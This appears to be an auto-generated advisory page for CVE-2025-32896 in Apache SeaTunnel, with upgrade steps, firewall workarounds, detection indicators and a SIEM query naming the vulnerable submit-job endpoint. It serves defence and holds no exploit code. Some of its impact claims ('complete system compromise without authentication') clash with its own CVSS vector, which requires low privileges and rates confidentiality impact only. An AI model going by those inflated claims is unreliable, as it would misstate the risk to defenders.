CVE-2025-32896 – Unauthorized attackers can exploit Apache SeaTu... (How to Fix)

Q: How do I fix CVE-2025-32896?

1. Download Apache SeaTunnel 2.3.11 from official sources. 2. Stop the SeaTunnel service. 3. Replace the installation with version 2.3.11. 4. Enable REST API v2 and HTTPS two-way authentication. 5. Restart the service.

Q: What is the severity of CVE-2025-32896?

CVE-2025-32896 has a CVSS score of 6.5 (MEDIUM). Unauthorized attackers can exploit Apache SeaTunnel's REST API to read arbitrary files and perform deserialization attacks by submitting malicious jobs. This affects all Apache SeaTunnel installations running version 2.3.10 or earlier. The vulnerability allows complete system compromise without authentication.

📋 TL;DR

Unauthorized attackers can exploit Apache SeaTunnel's REST API to read arbitrary files and perform deserialization attacks by submitting malicious jobs. This affects all Apache SeaTunnel installations running version 2.3.10 or earlier. The vulnerability allows complete system compromise without authentication.

💻 Affected Systems

Products:

Apache SeaTunnel

Versions: <=2.3.10

Operating Systems: All operating systems running Apache SeaTunnel

Default Config Vulnerable: ⚠️ Yes

Notes: Affects installations with REST API enabled (default configuration). The vulnerability is in the API v1 endpoint.

📦 What is this software?

Seatunnel by Apache

View all CVEs affecting Seatunnel →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise through deserialization leading to remote code execution, sensitive file exfiltration, and complete control of the SeaTunnel instance.

🟠

Likely Case

Unauthorized file reads exposing configuration files, credentials, and sensitive data, potentially leading to further system compromise.

🟢

If Mitigated

Limited impact if proper network segmentation and authentication controls are in place, though the vulnerability still exists.

🌐 Internet-Facing: HIGH - Unauthenticated remote exploitation makes internet-facing instances extremely vulnerable.

🏢 Internal Only: HIGH - Even internal instances are vulnerable to any network-accessible attacker.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

The vulnerability requires no authentication and involves simple HTTP requests to a known endpoint with crafted parameters.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.3.11

Vendor Advisory: https://lists.apache.org/thread/qvh3zyt1jr25rgvw955rb8qjrnbxfro9

Restart Required: Yes

Instructions:

1. Download Apache SeaTunnel 2.3.11 from official sources. 2. Stop the SeaTunnel service. 3. Replace the installation with version 2.3.11. 4. Enable REST API v2 and HTTPS two-way authentication. 5. Restart the service.

🔧 Temporary Workarounds

Disable REST API v1

all

Completely disable the vulnerable REST API v1 endpoint to prevent exploitation.

Modify SeaTunnel configuration to set `rest.api.enable` to `false` or remove/block access to `/hazelcast/rest/maps/submit-job` endpoint

Network Access Control

linux

Restrict network access to SeaTunnel REST API endpoints using firewall rules.

iptables -A INPUT -p tcp --dport [SeaTunnel_PORT] -s [TRUSTED_IPS] -j ACCEPT
iptables -A INPUT -p tcp --dport [SeaTunnel_PORT] -j DROP

🧯 If You Can't Patch

Implement strict network segmentation to isolate SeaTunnel instances from untrusted networks.
Deploy a web application firewall (WAF) with rules to block malicious requests to the vulnerable endpoint.

🔍 How to Verify

Check if Vulnerable:

Check if SeaTunnel version is 2.3.10 or earlier and REST API v1 is accessible at /hazelcast/rest/maps/submit-job without authentication.

Check Version:

Check SeaTunnel configuration files or run `seatunnel --version` if available in your installation.

Verify Fix Applied:

Verify installation shows version 2.3.11, confirm REST API v1 is disabled or protected, and test that unauthorized requests to the vulnerable endpoint are rejected.

📡 Detection & Monitoring

Log Indicators:

Unauthorized POST requests to /hazelcast/rest/maps/submit-job
Unusual job submissions with MySQL URL parameters containing file paths or serialized data
Error logs showing deserialization failures or file access errors

Network Indicators:

HTTP POST requests to SeaTunnel REST API from unauthorized IP addresses
Unusual traffic patterns to the submit-job endpoint

SIEM Query:

source="seatunnel.log" AND (url_path="/hazelcast/rest/maps/submit-job" OR message="submit-job") AND (src_ip NOT IN [AUTHORIZED_IPS])

📊 Metadata

CVE ID: CVE-2025-32896

CVSS v3 Score: 6.5 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CWE: CWE-306

EPSS Score: 0.17% exploit probability (38.1th percentile)

Published: June 19, 2025

Last Updated: July 8, 2025

🔗 References

https://github.com/apache/seatunnel/pull/9010 Issue Tracking,Patch
https://lists.apache.org/thread/qvh3zyt1jr25rgvw955rb8qjrnbxfro9 Mailing List,Vendor Advisory
http://www.openwall.com/lists/oss-security/2025/04/12/1 Mailing List,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-32896, you might also want to check these: